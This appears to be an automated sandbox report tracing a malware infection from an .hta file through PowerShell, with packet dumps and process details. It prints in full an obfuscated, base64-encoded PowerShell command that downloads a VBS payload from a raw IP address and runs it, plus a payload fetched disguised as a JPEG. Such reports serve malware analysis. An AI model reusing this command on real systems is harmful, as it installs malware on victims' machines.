Dec 2, 2024 07:38:30.433598042 CET	1236	IN	Data Raw: 74 4d 72 77 59 58 36 33 65 63 6b 79 37 42 4b 31 78 42 79 36 54 48 4d 41 61 4e 6e 67 71 2f 71 56 79 35 4c 58 71 55 74 33 6a 6c 73 2b 7a 69 68 45 34 42 7a 67 32 67 56 42 38 69 4e 53 57 71 2b 62 4a 67 50 69 4d 56 76 4a 66 78 54 4f 45 6d 68 68 2f 6a Data Ascii: tMrwYX63ecky7BK1xBy6THMAaNngq/qVy5LXqUt3jls+zihE4Bzg2gVB8iNSWq+bJgPiMVvJfxTOEmhh/japu2bWUkpnx900AKDUYKMrpw667XnUvynIGmmkahlDD5B+dpWFZsEnh5oKJKaHIhNVgCJSgoyX4nHiRr9f/+ZDIimT8RINqnVoIGMOVV1CsTt/HWmPDNDJUNJ/ThcR1qPbsJ9T31YVy0TmTZj7dafuUEt23hb7idl
Dec 2, 2024 07:38:30.433610916 CET	1236	IN	Data Raw: 75 46 71 70 2b 72 58 4b 4b 72 48 38 41 30 35 2b 46 52 6b 61 35 50 2b 41 51 78 51 6d 31 5a 49 48 77 6f 6e 43 63 5a 66 54 75 6a 55 4c 32 77 75 33 68 64 61 2b 41 64 44 49 45 73 39 44 4f 57 38 56 77 7a 55 34 6c 75 75 54 32 56 6b 63 56 4b 6e 4a 74 36 Data Ascii: uFqp+rXKKrH8A05+FRka5P+AQxQm1ZIHwonCcZfTujUL2wu3hda+AdDIEs9DOW8VwzU4luuT2VkcVKnJt65Yp2sJEQWhLQS+Tp/sWRHJCcBK3Xqlmuxgh1Sf/0OeN846mGYu18LzN7+zBSEeN7+aFDyNS2gHBxvj3C8PGUMRXaszU1aQ3hT1k5opQh/fH2VFtuLTwbBClRzRbES9/r46RDyAzPidZ/6idSqQuCKhlCHh7VIOd58
Dec 2, 2024 07:38:30.433625937 CET	1236	IN	Data Raw: 67 65 42 6f 4c 70 4b 64 70 64 6c 36 46 4b 48 78 57 59 62 74 62 5a 57 55 4d 4f 32 42 74 51 77 44 6b 75 4e 6c 76 61 7a 78 74 73 67 4a 6b 31 33 42 49 2f 31 53 61 4e 61 67 63 53 51 36 6e 36 7a 34 71 69 48 51 70 45 66 42 72 67 6d 4d 5a 45 42 36 6c 57 Data Ascii: geBoLpKdpdl6FKHxWYbtbZWUMO2BtQwDkuNlvazxtsgJk13BI/1SaNagcSQ6n6z4qiHQpEfBrgmMZEB6lWnqTRbAP1LN7bVkqw7QKGKRtta9a92IJRRNq0mtq4tH5llecA7DWxmklcxQ8F+R3slTThxO6LK8HHFDh7rcZ5KyMdaBnXe913VaYxaE5q8THq9U2NnogLGiNxP7+G/8BMuFs3u0fHZSmWQfqipIdVkxPRvGwgkteAw
Dec 2, 2024 07:38:30.433829069 CET	1236	IN	Data Raw: 6d 65 33 71 72 31 4a 52 73 74 4b 2b 69 62 48 55 70 77 64 6a 63 30 6d 62 58 77 76 65 4e 66 63 47 7a 61 2b 56 7a 4b 31 35 6f 4e 32 46 70 57 44 61 73 70 63 6f 55 71 36 67 76 56 33 46 61 6c 4d 32 32 65 77 39 46 53 38 2f 6a 72 4e 32 44 6e 71 59 38 75 Data Ascii: me3qr1JRstK+ibHUpwdjc0mbXwveNfcGza+VzK15oN2FpWDaspcoUq6gvV3FalM22ew9FS8/jrN2DnqY8uPVuXkQ/RvoGWXvdlkulz7qXfmlS9GpRAfZwcnfU/gSFnCpveacFQpj/STySIdrqOKFw0Q+y3LOAWAtqNcspAVLv8ffkLwIapFBvmikqR/NGzon9mDWl7TmsEPyZnCJ6BpnoNHieyhGRJP9+a+y+ZflO0heRAFvX/2
Dec 2, 2024 07:38:30.433841944 CET	1236	IN	Data Raw: 77 62 64 57 34 63 42 63 69 33 37 71 32 6c 4d 36 65 51 6d 42 65 38 74 32 6f 49 64 69 50 71 55 4f 78 67 76 69 30 4a 32 46 36 6b 31 70 48 46 39 2b 57 6e 62 65 57 72 7a 31 39 66 56 6c 48 62 53 44 4a 4e 6d 71 65 56 64 4c 36 6d 72 42 75 44 56 78 56 4b Data Ascii: wbdW4cBci37q2lM6eQmBe8t2oIdiPqUOxgvi0J2F6k1pHF9+WnbeWrz19fVlHbSDJNmqeVdL6mrBuDVxVKMrAZFmW10Stcxuq3nUNbghWBvdWd+MuDwsbxcopwTS8hZvC5lU27CErb5MIHGlFeQMAvMosJn/hudTa5huwssm1eMIvv61JTfil6xotFWtlUrSuRLyIp6pBrFB/M1QrmWkKWpTm5OOUc2E4G8rg5hzDT30LIT86Mh
Dec 2, 2024 07:38:30.433850050 CET	1236	IN	Data Raw: 2b 4a 64 4e 39 4c 6c 71 51 4f 59 49 48 74 55 75 78 7a 2b 4c 73 64 6e 42 58 75 53 6f 4a 73 2f 36 75 44 69 65 45 42 50 4d 51 6f 66 66 50 54 37 41 6d 30 55 51 78 6e 4c 2b 43 6e 4f 76 75 64 49 6e 35 4b 52 78 4a 52 6b 77 67 52 39 79 48 71 41 61 46 58 Data Ascii: +JdN9LlqQOYIHtUuxz+LsdnBXuSoJs/6uDieEBPMQoffPT7Am0UQxnL+CnOvudIn5KRxJRkwgR9yHqAaFXNW9I7oCmfyhMdM0s7R9UdKA8SK1T9Du3M8+xSpd74TO4gg1hrgTx/R7U/ykUSyUSEMs/etgNoLw4IovWi7Yc46IY+PjjbgWT4fjuBLWr/n8hO63cq4IoBdKfatRrItlKqUYcfkyy8n1o8IcnIz5JlYFujoNqIA+CI
Dec 2, 2024 07:38:30.553602934 CET	1236	IN	Data Raw: 76 6f 6e 68 78 56 64 59 62 39 59 2f 71 47 63 67 51 6b 66 66 74 65 77 77 63 57 75 74 4d 75 76 51 67 67 4c 2b 57 6a 6f 59 39 47 75 42 56 44 67 64 6c 51 73 50 42 51 33 31 44 33 71 64 2b 74 4a 70 70 6e 2f 51 76 45 4d 58 78 6f 55 69 4d 61 4a 4a 78 45 Data Ascii: vonhxVdYb9Y/qGcgQkfftewwcWutMuvQggL+WjoY9GuBVDgdlQsPBQ31D3qd+tJppn/QvEMXxoUiMaJJxEA67C0tg7bKZWY4Uw9vOE9aGU1TsGnLpg9VSD7+RDCPY6EGsGl9bndIWKMkJxj/xfoeZxX4wj3RBGe/NV2HMAjtzLFwv6GboMfRZAVEpkif/4xnnjVcmYBqrACNG30OftaLZvmJRlzgjpEWcdSoU3XEzLnCye3vTO3

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49716	142.215.209.77	443	3520	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:38:07 UTC	198	OUT	GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1 Host: 1016.filemail.com Connection: Keep-Alive
2024-12-02 06:38:08 UTC	328	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT Accept-Ranges: bytes ETag: 1c84779d9886011235a5e11f64ee8efb X-Transfer-ID: qxdlxyadbikkvgc Content-Disposition: attachment; filename=new_imagem-vbs.jpg Date: Mon, 02 Dec 2024 06:38:07 GMT Connection: close
2024-12-02 06:38:08 UTC	3715	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d Data Ascii: Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^'8^U]H,^`&!Sgk&iNTS3B}<h\WBHOux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU\|ZIJ%h
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb Data Ascii: wH?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1 Data Ascii: =./ER;UM'IlWLPOj=}Od.NEWcs+f:c(]{g}?Ps:X\|N-D{>&I\|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d Data Ascii: pEaU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY\|lAi?&Ig'z`y
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b Data Ascii: hCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl\|(`z8P,4*Bx2A
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93 Data Ascii: Ae[RTU7$xUI:v9.cO\|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj8.X62##4zY1+T{Y %b{]_M"*[n2r]/g]\3L[zdMVI
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef Data Ascii: @z(4EUPc!I`c`_4L5/hR17k4?/hN;N[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)\|(ev+)a7\|\A%]2*r(1=divq08
2024-12-02 06:38:08 UTC	8192	IN	Data Raw: d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0 Data Ascii: "]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,

Target ID:	0
Start time:	01:37:53
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\seemebestthingsgivenmegood.hta"
Imagebase:	0x3d0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:37:53
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:37:53
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:37:53
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Imagebase:	0xcd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:37:56
Start date:	02/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline"
Imagebase:	0xe40000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
